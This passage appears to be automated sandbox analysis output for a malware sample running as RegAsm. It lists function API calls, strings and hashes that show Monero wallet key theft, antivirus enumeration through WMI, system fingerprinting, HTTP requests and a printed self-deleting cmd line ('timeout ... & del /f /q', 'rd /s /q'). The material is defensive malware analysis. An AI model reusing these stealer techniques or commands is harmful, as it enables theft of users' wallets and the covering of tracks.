                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                                  • API String ID: 2435781452-2509457195
                                                                                                                                                                                                                                                                  • Opcode ID: 000bba3da9afd0714dec3e022a79a6def8987182737f21c0e5ca083b1abb64e0
                                                                                                                                                                                                                                                                  • Instruction ID: d4897b2415b3c0a6ddd8e2fd612fb6bd21709f0bfb2b25760a71d876596ed503
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 000bba3da9afd0714dec3e022a79a6def8987182737f21c0e5ca083b1abb64e0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C516BB590011DAFEB10EBA0DC85FEEBBB9EB05344F10407AF505B6181DB785A888BA5
                                                                                                                                                                                                                                                                  Function 004136D8 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004136DD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004136FD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413709
                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041371E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004138AA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004138B7
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004138C5
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004138D6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                                  • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                  • API String ID: 1312519015-206210831
                                                                                                                                                                                                                                                                  • Opcode ID: 6f9080cdc21e46a6c714ff01947ce3ed2e05a16bd0e7d648b2dbb08192df9983
                                                                                                                                                                                                                                                                  • Instruction ID: 1d590735ea8c28ab34f42f52d61139ed63d29c063289d3f0752b127fb499f175
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f9080cdc21e46a6c714ff01947ce3ed2e05a16bd0e7d648b2dbb08192df9983
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5141B1D0024CEACB01EBE5C985ADEBBB8AF15304F50007FA105B3182DB785B4CCB65
                                                                                                                                                                                                                                                                  Function 0041092F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 116comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00410934
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 00410944
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 00410955
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 0041096F
                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004109A5
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004109F4
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C73: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1A,?,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 00410C7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C73: CharToOemW.USER32(?,00000000), ref: 00410C87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00410A28
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                  • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                  • API String ID: 3694693100-2776955613
                                                                                                                                                                                                                                                                  • Opcode ID: 38bcd73b8b7c7f58b4340dcf06d13228eade726b315ebddd48ffbc21419cac35
                                                                                                                                                                                                                                                                  • Instruction ID: c6e26f8c1e0d19a7eb4eadc5addae829862853fc5ba26d72e18d251ce6a55b65
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38bcd73b8b7c7f58b4340dcf06d13228eade726b315ebddd48ffbc21419cac35
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E314A70A01229BBCB20DB91DD49EEF7F78FF49B54F50451AF115AA180C7B89642CBA8
                                                                                                                                                                                                                                                                  Function 00401C6B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 179stringfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00401C70
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401C8E
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00422360,?,?,?,0042234B,00000000,?,\Monero\wallet.keys,?), ref: 00401E04
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401E7F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401E9D
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                  • API String ID: 2725398440-218353709
                                                                                                                                                                                                                                                                  • Opcode ID: 98cc1c3aae89bf0f0f42f6a61ae6ef5ba79cc1811a789787eb33c2cd8a53e94f
                                                                                                                                                                                                                                                                  • Instruction ID: 7efe0a28a64b5cfe5a84a79a7a4ab28d59396878090cd2cdc861032bb607e2da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98cc1c3aae89bf0f0f42f6a61ae6ef5ba79cc1811a789787eb33c2cd8a53e94f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73715B71D00248AADB14EBE4D956BDDBBB8AF19318F14407EE505B31C2EB78174CCB69
                                                                                                                                                                                                                                                                  Function 004100B9 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004100BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 00410106
                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410150
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041017A
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410197
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 004101C1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004101D6
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 00410256
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                  • API String ID: 404191982-3278919252
                                                                                                                                                                                                                                                                  • Opcode ID: 3274945cadc3d0f5da4b5c87148f405e5bfda79ccb4031cce854dd7faa63cc38
                                                                                                                                                                                                                                                                  • Instruction ID: d5bc632647d26623add6340cd22672cd0e7df54627421ca2081f5f15733760fc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3274945cadc3d0f5da4b5c87148f405e5bfda79ccb4031cce854dd7faa63cc38
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A7114B590025DEEDF11EFA1DD84EEEBBBDBB19304F10006AE505B2151EB785A88CB64
                                                                                                                                                                                                                                                                  Function 0040F6D0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040F6D5
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6EB
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F70D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F74F
                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0040F888
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E19D: strlen.MSVCRT ref: 0040E1B4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD57: memcpy.MSVCRT ref: 0040DD77
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • N0ZWFt, xrefs: 0040F7F2, 0040F7FF
                                                                                                                                                                                                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F767, 0040F850
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                                  • API String ID: 3050127167-1622206642
                                                                                                                                                                                                                                                                  • Opcode ID: 3a6f7b861108cbe1819bebfe8817c2c57805d33606f5f1f7a4a4117b49b50245
                                                                                                                                                                                                                                                                  • Instruction ID: e0bb21690e5e363970e67a316829cc01213af197869752a4ae6fdd033285d198
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a6f7b861108cbe1819bebfe8817c2c57805d33606f5f1f7a4a4117b49b50245
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71517071900119AEDB24EB94DC81AEEBBB9EF44314F20017EF114B66C1DB785E88CB69
                                                                                                                                                                                                                                                                  Function 00410525 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041052A
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 0041054D
                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041057F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 004105C2
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004105C9
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004105F5
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,004262A0), ref: 00410604
                                                                                                                                                                                                                                                                    • Part of subcall function 004104EA: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104FB
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410623
                                                                                                                                                                                                                                                                    • Part of subcall function 0041113A: malloc.MSVCRT ref: 00411148
                                                                                                                                                                                                                                                                    • Part of subcall function 0041113A: strncpy.MSVCRT ref: 00411158
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00410650
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                  • String ID: :\$C
                                                                                                                                                                                                                                                                  • API String ID: 688099012-3309953409
                                                                                                                                                                                                                                                                  • Opcode ID: 89df5b652768a4d5ebc43df63e68aa115dedfdfa6efa48d2347cbc64f04f470a
                                                                                                                                                                                                                                                                  • Instruction ID: b2eb4e8e05693d3b84408a222d57ab8de69b0fcebb35d55d3b5720af2a3aff1c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89df5b652768a4d5ebc43df63e68aa115dedfdfa6efa48d2347cbc64f04f470a
